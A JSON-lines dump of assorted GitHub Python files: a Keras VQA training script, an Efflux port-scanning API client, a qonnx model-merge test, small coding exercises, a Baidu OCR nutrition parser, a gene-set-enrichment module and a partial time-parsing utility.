(Dense(nb_classes,))(merge_model)\nmerge_model = (Activation('softmax'))(merge_model)\n\nmodel = Model([q_model.input, i_model.input], merge_model)\n\nrmsprop = optimizers.RMSprop(lr=3e-4, rho=0.9, epsilon=1e-08, decay=1-0.99997592083) # 0.99\n#adam = optimizers.Adam(lr=4e-4, beta_1=0.8, beta_2=0.999, epsilon=1e-08, decay=1-0.99)\nmodel.compile(loss='categorical_crossentropy', optimizer=rmsprop, metrics=['accuracy'])\n# -----------------------------------------Training the model ----------------------------------------- #\n\nfrom keras.utils import generic_utils\nfrom sklearn import preprocessing\n\n# number of epochs that you would like to use to train the model.\nepochs = 12\n\n# batch size\nbatch_size = 128\n\n# save value of training, validation loss and accuracy in lists\nimport cb\n\nlabelencoder = preprocessing.LabelEncoder()\nlabelencoder.fit(topKAnswers)\n\n#val_size = len(K_images_val_id)\nsamples_train = int(len(K_questions) / batch_size)\nsamples_val = int(len(K_questions_val) / batch_size)\n\nprint('start training...')\ndef generator(isTrain, batch_size):\n\ti = 0\n\tl = len(K_questions)\n\tlv = len(K_questions_val)\n\twhile 1:\n\t\tif (isTrain):\n\t\t\t# preprocess the datas\n\t\t\t# X_batch_q = qtot(K_questions[i:min(i + batch_size, l)], max_len)\n\t\t\tX_batch_q = qtotIndex(K_questions[i:min(i + batch_size, l)], vocabulary, max_len)\n\t\t\tX_batch_i = itot(K_images_id[i:min(i + batch_size, l)])\n\n\t\t\t# l2 normalize images\n\t\t\tX_batch_i = X_batch_i / np.linalg.norm(X_batch_i, axis=1).reshape(-1,1)\n\n\t\t\tY_batch = atot(K_answers[i:min(i + batch_size, l)], labelencoder)\n\t\telse:\n\t\t\t# preprocess the datas\n\t\t\t# X_batch_q = qtot(K_questions_val[i:min(i + batch_size, l)], max_len)\n\t\t\tX_batch_q = qtotIndex(K_questions_val[i:min(i + batch_size, l)], vocabulary, max_len)\n\t\t\tX_batch_i = itot(K_images_val_id[i:min(i + batch_size, l)])\n\n\t\t\t# l2 normalize images\n\t\t\tX_batch_i = X_batch_i / np.linalg.norm(X_batch_i, axis=1).reshape(-1,1)\n\n\t\t\tY_batch = atot(K_answers_val[i:min(i + batch_size, l)], labelencoder)\n\n\t\tyield [X_batch_q, X_batch_i], Y_batch\n\n\t\ti += batch_size\n\n\t\tif isTrain and i > l:\n\t\t\ti = 0\n\t\tif not isTrain and i > lv:\n\t\t\ti 
= 0\n\n# prepare my callbacks (save train, val acc/loss in lists)\nhistories = cb.Histories()\n\nfrom keras.callbacks import ModelCheckpoint\ncheckpointer = ModelCheckpoint(filepath='weights/LSTMQ_I/resnet_weights.{epoch:02d}-{val_loss:.2f}.hdf5', verbose=1, save_best_only=False) # TODO: delete resnet_\nmodel.fit_generator(generator(True, batch_size=batch_size), steps_per_epoch = samples_train, epochs=epochs,\n\t\t\t\t\tvalidation_data=generator(False, batch_size=batch_size),\n\t\t\t\t\tcallbacks=[checkpointer, histories], validation_steps=samples_val)\n\n# save validation, training acc/loss to csv files (to print result without retraining all the model from scratch)\nltocsv(histories.train_loss, 'histories/LSTMQ_I/resnet_train_loss.csv') # delete resnet_\nltocsv(histories.val_loss, 'histories/LSTMQ_I/resnet_val_loss.csv')\nltocsv(histories.train_acc, 'histories/LSTMQ_I/resnet_train_acc.csv')\nltocsv(histories.val_acc, 'histories/LSTMQ_I/resnet_val_acc.csv')","repo_name":"Twice22/VQA","sub_path":"LSTMQ_I.py","file_name":"LSTMQ_I.py","file_ext":"py","file_size_in_byte":6155,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"14856034507","text":"import logging\nfrom .rest_adapter import RestAdapter\nfrom .models import *\n\n\nclass EffluxAPI:\n \"\"\" Main API Class\n \"\"\"\n def __init__(self, hostname: str = 'api.effluxio.com/api', api_key: str = '', ver: str = 'v2', ssl_verify: bool = True, logger: logging.Logger = None):\n \"\"\"__init__ \n\n Args:\n hostname (str, optional): API hostname. Defaults to 'api.effluxio.com/api'.\n api_key (str, optional): API Key. Defaults to ''.\n ver (str, optional): API Version. Defaults to 'v2'.\n ssl_verify (bool, optional): Verify SSL. Defaults to True.\n logger (logging.Logger, optional): Debug logging. Defaults to None.\n \"\"\"\n self._rest_adapter = RestAdapter(\n hostname, api_key, ver, ssl_verify, logger)\n\n def post_scan(self, hosts: list = ['8.8.8.8'], ports: list = [\"top_10\", \"23\", \"135\", \"139\", \"5900\"], fingerprint: int = 1, protocol: str = \"tcp\") -> Scan:\n \"\"\"post_scan POST request to scan endpoint\n\n Args:\n hosts (list, optional): Hosts to scan. Defaults to ['8.8.8.8'].\n ports (list, optional): Ports to scan. Defaults to [\"top_10\", \"23\", \"135\", \"139\", \"5900\"].\n fingerprint (int, optional): Fingerprinting level - 0:open, 1:banner, 2:identify services. Defaults to 1.\n protocol (str, optional): Scan protocol - tcp/udp. Defaults to \"tcp\".\n\n Returns:\n Scan: Scan object\n \"\"\"\n scan_data = {\n \"hosts\": hosts,\n \"ports\": ports,\n \"proto\": protocol,\n \"fingerprint\": fingerprint\n }\n _, _, data = self._rest_adapter.POST(endpoint='/scans', data=scan_data)\n return Scan.from_dict(data)\n \n def post_scan_repeat(self, job: str) -> Scan:\n \"\"\"post_scan_repeat Repeats scan based on jobid\n\n Args:\n job (str): previously run job_id you want to run\n\n Returns:\n Scan: Scan Object\n \"\"\"\n endpoint = \"/scans/repeat/\" + job\n _, _, data = self._rest_adapter.POST(endpoint=endpoint)\n return Scan.from_dict(data)\n \n def get_scans(self, count: int = 10) -> list[Scan]:\n \"\"\"get_scans Get list of n historical user scans\n\n Args:\n count (int): Number of scans to return. 
Defaults to 10.\n\n Returns:\n scans: Returns list of previous n scans in list[Scan] format\n \"\"\"\n endpoint = \"/scans?count=\" + str(count)\n _, _, data = self._rest_adapter.GET(endpoint=endpoint)\n scans: list[Scan] = []\n for scan in data:\n scans.append(Scan.from_dict(scan))\n return scans\n \n def get_scan_job(self, job: str, details: bool = True) -> Scan:\n \"\"\"get_scan_job GET request to scan endpoint to get details about a scan.\n\n Args:\n job (str): Job ID\n details (bool, optional): Whether to return the scan result details. Defaults to True.\n\n Returns:\n Scan: Scan Object\n \"\"\"\n endpoint = \"/scans/\" + job + \"?details=\" + str(details)\n _, _, data = self._rest_adapter.GET(endpoint=endpoint)\n return Scan.from_dict(data)\n \n def get_scan_status(self, job: str) -> str:\n \"\"\"get_scan_status _summary_\n\n Args:\n job (str): Job ID\n\n Returns:\n str: Returns scan status as a string - \"pending\",\"in progress\", \"complete\"\n \"\"\"\n scan = self.get_scan_job(job=job,details=False)\n return str(scan.status)\n \n def get_scan_results(self, job: str, details: bool = True):\n \"\"\"get_scan_results _summary_\n\n Args:\n job (str): Job ID\n details (bool, optional): Whether to return the scan result details. Defaults to True.\n\n Returns:\n _type_: Returns result variable - [dict[str, IP]]\n \"\"\"\n scan = self.get_scan_job(job=job,details=details)\n return scan.results\n","repo_name":"TylerBoire/efflux","sub_path":"efflux/efflux_api.py","file_name":"efflux_api.py","file_ext":"py","file_size_in_byte":3951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8467378805","text":"import numpy as np\nimport onnx\nimport onnx.numpy_helper as np_helper\nfrom onnx import TensorProto, helper\nfrom pkgutil import get_data\n\nimport qonnx.core.onnx_exec as oxe\nfrom qonnx.core.datatype import DataType\nfrom qonnx.core.modelwrapper import ModelWrapper\nfrom qonnx.transformation.general import GiveReadableTensorNames, GiveUniqueNodeNames\nfrom qonnx.transformation.infer_data_layouts import InferDataLayouts\nfrom qonnx.transformation.infer_datatypes import InferDataTypes\nfrom qonnx.transformation.infer_shapes import InferShapes\nfrom qonnx.transformation.merge_onnx_models import MergeONNXModels\nfrom qonnx.util.basic import qonnx_make_model\n\n\ndef test_merge_onnx_models():\n # load pre model\n raw_m = get_data(\"qonnx.data\", \"onnx/mnist-conv/model.onnx\")\n model1 = ModelWrapper(raw_m)\n # the input for model1 comes from a uint8 vector so we set the finn datatype\n # of the input tensor to DataType[\"UINT8\"] to verify that the datatypes are\n # correctly preserved in the transformed model\n model1.set_tensor_datatype(model1.graph.input[0].name, DataType[\"UINT8\"])\n model1 = model1.transform(InferShapes())\n model1 = model1.transform(GiveUniqueNodeNames())\n model1 = model1.transform(GiveReadableTensorNames())\n\n # set up post model\n shape = [1, 10]\n inp = helper.make_tensor_value_info(\"inp\", TensorProto.FLOAT, shape)\n a0 = helper.make_tensor_value_info(\"a0\", TensorProto.FLOAT, [])\n a1 = helper.make_tensor_value_info(\"a1\", TensorProto.FLOAT, [])\n outp = helper.make_tensor_value_info(\"outp\", TensorProto.FLOAT, shape)\n\n mul_node = helper.make_node(\"Mul\", [\"inp\", \"a0\"], [\"mul_out\"])\n div_node = helper.make_node(\"Div\", [\"mul_out\", \"a1\"], [\"outp\"])\n\n graph = helper.make_graph(\n nodes=[mul_node, div_node],\n name=\"model2-graph\",\n inputs=[inp],\n outputs=[outp],\n value_info=[a0, 
a1],\n )\n\n exp_opset_id = 13\n model2 = qonnx_make_model(graph, producer_name=\"model2\", opset_imports=[helper.make_opsetid(\"\", exp_opset_id)])\n model2 = ModelWrapper(model2)\n # initialize model2\n a0_value = np.random.uniform(low=0, high=1, size=(1)).astype(np.float32)\n model2.set_initializer(\"a0\", a0_value)\n a1_value = np.random.uniform(low=0.1, high=1, size=(1)).astype(np.float32)\n model2.set_initializer(\"a1\", a1_value)\n # set a dummy sparsity annotation to check if it gets correctly transferred\n # to the merged model\n sparsity = {\"dw\": {\"kernel_shape\": [0, 0]}}\n model2.set_tensor_sparsity(\"a1\", sparsity)\n model2 = model2.transform(InferShapes())\n model2 = model2.transform(InferDataTypes())\n model2 = model2.transform(InferDataLayouts())\n model2 = model2.transform(GiveUniqueNodeNames())\n model2 = model2.transform(GiveReadableTensorNames())\n\n # simulate the models before the merging and pass the output of model1 to model2\n # load one of the test vectors\n raw_i = get_data(\"qonnx.data\", \"onnx/mnist-conv/test_data_set_0/input_0.pb\")\n inp_values = onnx.load_tensor_from_string(raw_i)\n inp_values = np_helper.to_array(inp_values)\n idict = {model1.graph.input[0].name: inp_values}\n odict = oxe.execute_onnx(model1, idict)\n temp = odict[model1.graph.output[0].name]\n\n idict = {model2.graph.input[0].name: temp}\n odict = oxe.execute_onnx(model2, idict)\n outp = odict[model2.graph.output[0].name]\n # merge models\n model_transformed = model2.transform(MergeONNXModels(model1))\n\n idict = {model_transformed.graph.input[0].name: inp_values}\n odict = oxe.execute_onnx(model_transformed, idict)\n outp_transformed = odict[model_transformed.graph.output[0].name]\n\n assert (outp == outp_transformed).all()\n assert len(model_transformed.graph.node) == len(model1.graph.node) + len(model2.graph.node)\n # to test if the value is preserved we set the sparsity annotation of input[1]\n # of the division block to a dummy value, we can now look for the division block\n # and check if the sparsity annotation is still the same\n for n in model_transformed.graph.node:\n if n.op_type == \"Div\":\n tensor_name = n.input[1]\n set_sparsity = model_transformed.get_tensor_sparsity(tensor_name)\n assert sparsity == set_sparsity\n\n # check if finn datatype of graph.input[0] is still set to UINT8\n assert model_transformed.get_tensor_datatype(\"global_in\") == DataType[\"UINT8\"]\n # check that the merged model uses the greater of the two input opsets\n assert model_transformed.model.opset_import[0].version == exp_opset_id\n","repo_name":"fastmachinelearning/qonnx","sub_path":"tests/transformation/test_merge_onnx_models.py","file_name":"test_merge_onnx_models.py","file_ext":"py","file_size_in_byte":4547,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"48"} +{"seq_id":"72225707025","text":"from math import sqrt\ndef nextSqure(n):\n # 함수를 완성하세요\n x='no'\n if int(sqrt(n))==sqrt(n):\n x=(sqrt(n)+1)**2\n return x\n\n# 아래는 테스트로 출력해 보기 위한 코드입니다.\nprint(\"결과 : {}\".format(nextSqure(1036355)));","repo_name":"youngstone89/python-algorithm-training","sub_path":"nextSquare.py","file_name":"nextSquare.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8252684439","text":"board = [[0, 0, 0, 0, 0], [0, 0, 1, 0, 3], [0, 2, 5, 0, 1], [4, 2, 4, 4, 2], [3, 5, 1, 3, 1]]\nmoves = [1, 5, 3, 5, 1, 2, 1, 4]\n\nbasket = []\nanswer = 0\nfor i in moves:\n for j in 
range(len(board)):\n if board[j][i-1] != 0:\n basket.append(board[j][i-1])\n if len(basket) >= 2:\n if basket[len(basket)-2] == basket[len(basket)-1]:\n del basket[len(basket)-2]\n del basket[len(basket)-1]\n answer += 2\n board[j][i-1] = 0\n break\n\n\nprint(basket)\nprint(board)\nprint(answer)\n","repo_name":"pjjoy/python","sub_path":"study_homeworks/hyunjae/algorithm/level1/Exercise01_pickdoll.py","file_name":"Exercise01_pickdoll.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8324095955","text":"# Author: Wenfeng Du\r\n# Create Date: 2019-08-01\r\n# -*- coding: utf-8 -*-\r\n\r\nimport urllib.request\r\nimport requests\r\nimport json\r\nimport base64\r\nimport re\r\n\r\nclass AILogic:\r\n \"\"\"\r\n 从百度AI的API解释图片并返回识别结果\r\n \"\"\"\r\n\r\n def get_baidutoken(self, client_id, client_secret):\r\n \"\"\"\r\n 通过客户ID和客户密码获得token\r\n :param client_id:\r\n :param client_secret:\r\n :return:\r\n \"\"\"\r\n # client_id 为官网获取的AK, client_secret 为官网获取的SK\r\n host = 'https://aip.baidubce.com/oauth/2.0/token?' + \\\r\n 'grant_type=client_credentials&client_id=' + client_id + '&client_secret=' + client_secret\r\n request = urllib.request.Request(host)\r\n request.add_header('Content-Type', 'application/json; charset=UTF-8')\r\n response = urllib.request.urlopen(request)\r\n content = response.read()\r\n access_token = json.loads(content)['access_token']\r\n self.access_token = access_token\r\n\r\n def img_tobase64(self, img_name):\r\n \"\"\"\r\n 图片转换成64位\r\n :param img_name:图片名称\r\n :return:\r\n \"\"\"\r\n with urllib.request.urlopen(img_name) as f:\r\n base64_data = base64.b64encode(f.read())\r\n code64 = base64_data.decode()\r\n return code64\r\n\r\n def get_ocr_response(self, img_code, access_token):\r\n \"\"\"\r\n OCR返回结果\r\n :param img_code:图片转码\r\n :param access_token: 访问token\r\n :return:\r\n \"\"\"\r\n host = 'https://aip.baidubce.com/rest/2.0/ocr/v1/general_basic?access_token=' + access_token\r\n datas = {'image': img_code}\r\n r = requests.post(host, data=datas)\r\n if r.status_code == 200:\r\n return r.content.decode('utf-8')\r\n else:\r\n return \"\"\r\n\r\n def ocr_action(self, df):\r\n \"\"\"\r\n OCR结果提取文字\r\n :param df: 原始dataframe,按行取信息\r\n :return:\r\n \"\"\"\r\n link = df['pic_links']\r\n if str(link) != 'nan' and len(link) > 0:\r\n link = link.split(',')[0]\r\n img_code = self.img_tobase64(link)\r\n response = self.get_ocr_response(img_code, self.access_token)\r\n jload = json.loads(response)\r\n words_result = jload['words_result']\r\n sentence = \"\"\r\n for i in range(len(words_result)):\r\n sentence += words_result[i]['words']\r\n df['sentence'] = sentence\r\n if \"营养\" in sentence:\r\n sentence = sentence.replace(\"O\", '0')\r\n sentence = sentence.replace(\" \",\"\")\r\n searchObj = re.findall(r'每份?\\(?(\\d{1,3}[m|毫]?[9|g|l|克|升|L]?)\\)?', sentence)\r\n if (len(searchObj) > 0):\r\n df['nutrition_basic'] = searchObj[0]\r\n searchObj = re.findall(r'能量(\\d{1,4})[k|千][J|焦|」]?', sentence)\r\n if (len(searchObj) > 0):\r\n df['energy'] = searchObj[0]\r\n searchObj = re.findall(r'蛋白质(\\d{1,3}\\.?\\d{0,2})[q|g|克]?', sentence)\r\n if (len(searchObj) > 0):\r\n df['protein'] = searchObj[0]\r\n searchObj = re.findall(r'脂肪(\\d{1,3}\\.?\\d{0,2})[a|g|q|克]?', sentence)\r\n if (len(searchObj) > 0):\r\n df['fat'] = searchObj[0]\r\n searchObj = re.findall(r'反式脂肪酸(\\d{1,3})[g|q|克]?', sentence)\r\n if (len(searchObj) > 0):\r\n df['trans_fat'] = searchObj[0]\r\n searchObj = 
re.findall(r'碳水化合物(\\d{1,3}\\.?\\d{0,2})[g|克]?', sentence)\r\n if (len(searchObj) > 0):\r\n df['carbohydrate'] = searchObj[0]\r\n searchObj = re.findall(r'膳食纤维(\\d{1,3}\\.?\\d{0,2})g?', sentence)\r\n if (len(searchObj) > 0):\r\n df['fiber'] = searchObj[0]\r\n searchObj = re.findall(r'钠(\\d{1,3})[m|毫]?[a|g|克]?', sentence)\r\n if (len(searchObj) > 0):\r\n df['sodium'] = searchObj[0]\r\n searchObj = re.findall(r'左旋肉碱(\\d{1,4})[m|毫]?[a|g|克]?', sentence)\r\n if (len(searchObj) > 0):\r\n df['carnitine'] = searchObj[0]\r\n return df","repo_name":"duwf2003/baidu_ocr","sub_path":"AILogic.py","file_name":"AILogic.py","file_ext":"py","file_size_in_byte":4359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4598903107","text":"n = int(input())\ndem = 0\na = [0]*10005\nmaxN=0\nwhile dem<n:\n s = list(map(int,input().split()))\n maxN = max(maxN,max(s))\n dem += len(s)\n for i in s:\n a[i] = 1\nkq = 1\nfor i in range(1,maxN+1):\n if a[i] ==0:\n kq = 0\n print(i)\nif kq ==1:\n print(\"Excellent!\")\n ","repo_name":"HongDuy119/CODE_PYTHON","sub_path":"PY02066 - BÀI TOÁN ĐẾM.py","file_name":"PY02066 - BÀI TOÁN ĐẾM.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22115637184","text":"from .. import utils\nfrom .. import ops\n\nsstats = utils.py.loadExternalModule(\"scipy.stats\")\nnp = utils.py.loadExternalModule('numpy')\n\nplt = utils.py.loadExternalModule('matplotlib.pylab') \nfc = utils.py.loadExternalModule('fastcluster')\nsp = utils.py.loadExternalModule('scipy')\n\nfrom collections import namedtuple\n\nfrom . import permutations\n\n@utils.decorators.deprecated(\"setEnrichment is deprecated. Use set_enrichment instead.\")\ndef setEnrichment(your_set, other_set, universe):\n \"\"\"\n Perform set enrichment using either a fisher exact test or the chi2 test.\n parameters:\n -----------\n your_set: list. Elements you want to test for enrichment\n other_set: list. Elements you want to see whether they are enriched in your_set\n universe: list. Total universe of elements\n abcd_values: Boolean. If True, it will return the actual element values in the contingency table, rather than just counts\n \n returns:\n Named tuple with:\n * oddsratio: fisher oddsratio\n * c2statistic : chi2 test statistic\n * pvalue : pvalue of test\n * table: contingency table [ [a,b],[c,d] ]\n - a: Overlap of the two sets\n - b: What is in other_set but not in your_set\n - c: what is in your_set but not in other_set\n - d: What is in universe but not in your_set or other_set\n * table_values: contingency table values [ [a,b],[c,d] ]\n - As see above\n * method : fisher|c2statistic\n \"\"\"\n return set_enrichment(your_set, other_set, universe)\n#edef\n\ndef set_enrichment(your_set, other_set, universe):\n \"\"\"\n Perform set enrichment using either a fisher exact test or the chi2 test.\n parameters:\n -----------\n your_set: list. Elements you want to test for enrichment\n other_set: list. Elements you want to see whether they are enriched in your_set\n universe: list. Total universe of elements\n abcd_values: Boolean. 
If True, it will return the actual element values in the contingency table, rather than just counts\n \n returns:\n Named tuple with:\n * oddsratio: fisher oddsratio\n * c2statistic : chi2 test statistic\n * pvalue : pvalue of test\n * table: contingency table [ [a,b],[c,d] ]\n - a: Overlap of the two sets\n - b: What is in other_set but not in your_set\n - c: what is in your_set but not in other_set\n - d: What is in universe but not in your_set or other_set\n * table_values: contingency table values [ [a,b],[c,d] ]\n - As see above\n * method : fisher|chi2\n \"\"\"\n\n \n resTuple = namedtuple(\"setEnrichmentResult\", [ 'oddsratio', 'c2statistic', 'pvalue', 'table', 'table_values', 'method'])\n\n universe = set(universe)\n your_set = set(your_set) & universe\n other_set = set(other_set) & universe\n \n a = your_set & other_set\n b = other_set - your_set\n c = your_set - other_set\n d = universe - (your_set | other_set)\n \n table = [ [len(a), len(b)], [len(c), len(d)]]\n if min(min(table)) <= 5:\n method = 'fisher'\n oddsratio, p = sstats.fisher_exact(table)\n chi2 = None\n else:\n method = 'chi2'\n chi2, p, dof, expected = sstats.chi2_contingency(table)\n oddsratio = 100\n if table[1][0] > 0 and table[0][1] > 0:\n oddsratio = table[0][0] * table[1][1] / (table[1][0] * table[0][1])\n else:\n oddsratio = np.inf\n #fi\n #fi\n\n return resTuple(oddsratio, chi2, p, table, [[a,b],[c,d]], method)\n#edef\n\ndef gsea(scores, membership, sort=True, sort_abs=True, p=1, side='both',\n max_perm=1000, min_perm=100, perm_thresh=0.2, plot=None):\n \"\"\"\n Gene Set Enrichment Analysis.\n \n parameters:\n -----------\n scores: A list of scores. Each score refers to a gene/locus/object/whatever.\n NOTE: the SMALLEST score will be at the TOP of the list. Thus, a ranking of\n [ 4,2,1,5 ] -> [ 1,2,4,5 ]\n membership: A list of 0/1 for each object, indicating whether it is in the desired set or not.\n sort: Are the items already sorted?\n sort_abs: Boolean. If sort, then sort the scores with absolute value (or not)\n p: Float, An exponent p to control the weight of the step.\n side: 'left' | 'right' | 'both', Calculate exceedences on which side\n left: Count number <= statistic\n right: Count number >= statistic\n both: min(left, right)\n max_perm: Integer. The maximum number of permutations to perform when calculating p-values\n We attempt to prevent many unnecessary permutations.\n min_perm: Integer. The absolute minimum number of permutations to perform.\n perm_thresh: Float. 
Only perform more permutations than min_perm if the % of exceedences of the\n statistic is less than this value\n plot: None|matplotlib.axis.\n if not None, plot the histogram \n \n Returns:\n --------\n a named tuple with:\n (es=enrichment_score,\n p=pvalue,\n i=number_of_genes_at_peak,\n idx=original_index_of_set_genes_at_peak)\n \"\"\"\n \n nt = namedtuple('GSEA_Result', [ 'es', 'p', 'i', 'idx'])\n \n if len(scores) != len(membership):\n raise ValueError(\"gsea: scores and membership must be same length\")\n #fi\n \n L = zip(range(len(scores)), scores, membership)\n L = sorted(L, key=lambda o: o[1])\n \n O, S, M = zip(*L)\n S = np.array(S)\n M = 1*np.array(M)\n O = np.array(O)\n\n N = len(S)\n NH = sum(M)\n \n if NH == 0:\n return nt(0, 1.0, N, [])\n #fi\n \n def calculate_es(s, m):\n NR = sum(s[m==1]**p)\n\n def pmiss(i):\n return sum(m[:i]==0) / (N - NH)\n #edef\n def phit(i):\n return sum((s[:i][m[:i]==1])**p)/NR\n #edef\n \n es_i = [ (i, phit(i) - pmiss(i)) for i in range(1, N) ]\n \n i, es = sorted(es_i, key=lambda x: x[1])[-1]\n \n return es, es_i, i\n #edef\n \n es, es_i, i = calculate_es(S, M)\n index_i = O[np.where(M[:i] == 1)]\n \n perm_es = [ calculate_es(S, np.random.choice(M, N, replace=False))[0] for i in range(min_perm) ]\n perm_steps = int(np.ceil(max_perm / 10))\n \n nex = 0\n while len(perm_es) < max_perm:\n if side == 'left':\n nex = len([e for e in perm_es if e <= es ])\n elif side == 'right':\n nex = len([e for e in perm_es if e >= es ])\n elif side == 'both':\n nex = min(len([e for e in perm_es if e <= es ]), \n len([e for e in perm_es if e >= es ]))\n else:\n raise ValueError(\"Unknown side: '%s'. See docstring.\" % side)\n #fi\n \n if nex / len(perm_es) > perm_thresh:\n break\n #fi\n \n perm_es.extend([ calculate_es(S, np.random.choice(M, N, replace=False))[0] for i in range(perm_steps) ])\n \n #ewhile\n return nt(es, permutations.pvalue(es, perm_es, side=side), i, index_i)\n#edef\n\n##############################################################################\n\nclass EnrichmentNetwork(object):\n \"\"\"\n Make a network visualization from the results of an enrichment.\n \"\"\"\n def __init__(self, enrichments, q_col='q', table_col='table', table_values_col='table_values'):\n \"\"\"\n \n parameters:\n -----------\n enrichments: pandas.DataFame\n Output from an enrichment. e.g. 
biu.db.KEGG.enrich, or biu.db.Reactome.enrich.\n q_col: String\n The name of the column with the corrected p-values\n table_col: String\n The name of the column with the contingency table\n table_values_col: String\n The name of the column with the object names in the contingency table (gene names rather than counts)\n \n Properties:\n -----------\n nodes: the original enrichments\n edges: The distance between terms\n \n draw(): Draw the network.\n \"\"\"\n def distance(a,b):\n if a == b:\n return 0\n #fi\n return 1/(np.log10(len(a&b) + 1)+1)\n #edef\n\n feat = enrichments[[q_col, table_col, table_values_col]].rename(columns={\n q_col: 'q',\n table_col : 'table',\n table_values_col : 'table_values'}).copy()\n feat['total'] = feat.table_values.apply(lambda x: x[0][0] | x[0][1])\n feat['n'] = feat.table.apply(lambda x: x[0][0])\n\n values = feat.total.to_dict()\n\n D = np.zeros([feat.shape[0]]*2)\n\n for i, (node_i, values_i) in enumerate(values.items()):\n for j, (node_j, values_j) in enumerate(values.items()):\n D[i,j] = D[j,i] = distance(values_i, values_j)\n #efor\n #efor\n \n self._enrichments = enrichments\n self._nodes = feat\n self._edges = D\n #edef\n \n @property\n def nodes(self):\n return self._nodes\n #edef\n \n @property\n def edges(self):\n return self._edges\n #edef\n \n def _embed(self, network):\n from sklearn.manifold import MDS\n E = MDS(n_components=2, dissimilarity='precomputed').fit_transform(self.edges)\n return E\n #edef\n \n def draw(self, distance_threshold=0.3, ax=None, cmap=None, nodes=None, n_clusters=1, min_qval=None):\n\n from sklearn.manifold import MDS\n from sklearn.manifold import Isomap\n import fastcluster\n import scipy as sp\n\n E = self._embed(self._edges)\n\n self._nodes['x'] = E[:,0]\n self._nodes['y'] = E[:,1]\n\n if ax is None:\n fig, axes = utils.figure.subplots(figsize=(10,10), dpi=300)\n ax = axes[0]\n #fi\n \n if min_qval is None:\n min_qval = self._nodes.q.min()\n #fi\n\n color = self._nodes.q.apply(lambda x: -np.log10(x)) / -np.log10(min_qval)\n cmap = plt.get_cmap('plasma') if cmap is None else cmap\n ax.scatter(self._nodes.x, self._nodes.y, s=self._nodes.n*4, edgecolor='k', c=cmap(color))\n for i, r in self._nodes.iterrows():\n ax.text(r.x, r.y, str(i))\n #efor\n\n #L = fc.linkage(sp.spatial.distance.squareform(self.edges, checks=False), method='complete')\n L = fc.linkage(E, metric='euclidean', method='complete')\n clusters = ops.lst.flatten(sp.cluster.hierarchy.cut_tree(L, n_clusters=n_clusters))\n\n for i,j in np.ndindex(self.edges.shape):\n if i > j:\n continue\n #fi\n\n if self.edges[i,j] < distance_threshold:\n if clusters[i] == clusters[j]:\n ax.plot([E[i,0],E[j,0]], [E[i,1],E[j,1]], zorder=-1, c='#565656', alpha=0.5)\n else:\n ax.plot([E[i,0],E[j,0]], [E[i,1],E[j,1]], zorder=-2, c='#eaeaea')\n #fi\n #fi\n #efor\n \n xlim, ylim = (ax.get_xlim(), ax.get_ylim())\n plotlim = ylim[0] + (ylim[1]-ylim[0])/10\n \n sizes = np.array([ 10, 25, 50, 100, 200, 300 ])\n sizes = sizes[ sizes <= max(self._nodes.n) ]\n stepsize = (ylim[1]-ylim[0])/10 / len(sizes)\n \n plt.scatter([xlim[0]+(xlim[1]-xlim[0])*0.1] * len(sizes),\n ylim[0] + (1 + np.array(range(len(sizes))))[::-1]*stepsize,\n c='k', edgecolor='k', s=sizes*4)\n \n dendfig, dendaxes = utils.figure.subplots(figsize=(20,5))\n dend = sp.cluster.hierarchy.dendrogram(L, ax=dendaxes[0], labels=self.nodes.index, )\n\n 
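# hand the scatter figure back so the caller can save or embed it\n return ax.get_figure()\n 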
#edef\n#eclass\n","repo_name":"thiesgehrmann/BIU","sub_path":"biu/stats/enrichment.py","file_name":"enrichment.py","file_ext":"py","file_size_in_byte":11721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"72422075347","text":"'''\n The rules of the game are very simple. \n The players move in turns. Akshat won gold, so he makes the first move.\n During his/her move, a player must choose any remaining intersection point and \n remove from the grid all sticks which pass through this point. \n A player will lose the game if he/she cannot make a move \n (i.e. there are no intersection points remaining on the grid at his/her move).\n\nAssume that both players play optimally. Who will win the game?\n Link: https://codeforces.com/problemset/problem/451/A\n'''\n\ndef game_with_sticks(n, m):\n round_num = 0\n while n >= 1 and m >= 1:\n n -= 1\n m -= 1\n round_num += 1\n\n return \"Akshat\" if round_num % 2 != 0 else \"Malvika\"\n","repo_name":"hadrizia/coding","sub_path":"code/advanced_algorithms_problems/list_1/game_with_sticks.py","file_name":"game_with_sticks.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13957047412","text":"import datetime\nimport re\nfrom math import ceil\nfrom zoneinfo import ZoneInfo\n\nfrom dateparser import parse\n\nfrom utils.ids import TournamentReminders\n\n\ndef convert_to_utc(dtime: datetime.time, tz: str) -> datetime.time:\n \"\"\"Converts the time from a given timezone to the UTC time.\n We have to use this since timed tasks for some reason do not work with tzinfo.\n I don't know why since the docs say it should work but it just does not work for me.\n That's why we have to do ourselves.\n \"\"\"\n offset = datetime.datetime.now(ZoneInfo(tz)).utcoffset()\n temp_dtime = datetime.datetime.combine(datetime.datetime.now(ZoneInfo(tz)), dtime)\n return (temp_dtime - offset).time() if offset else temp_dtime.time()\n\n\ndef convert_time(input_time: str) -> tuple[int, str]:\n \"\"\"Converts the given input into raw seconds, plus a readable string.\"\"\"\n\n # 1d1h1m1s -> 1d 1h 1m 1s, also done for preventing false positives with absolute times.\n input_time = re.sub(r\"([dhms])(\\d)\", r\"\\1 \\2\", input_time)\n\n dt = parse(\n input_time,\n settings={\n \"PREFER_DAY_OF_MONTH\": \"first\",\n \"PREFER_DATES_FROM\": \"future\",\n \"TIMEZONE\": TournamentReminders.TIMEZONE,\n \"RETURN_AS_TIMEZONE_AWARE\": True,\n # We want the relative time to be parsed first, since it's the most common one.\n # Also there would be false positives with 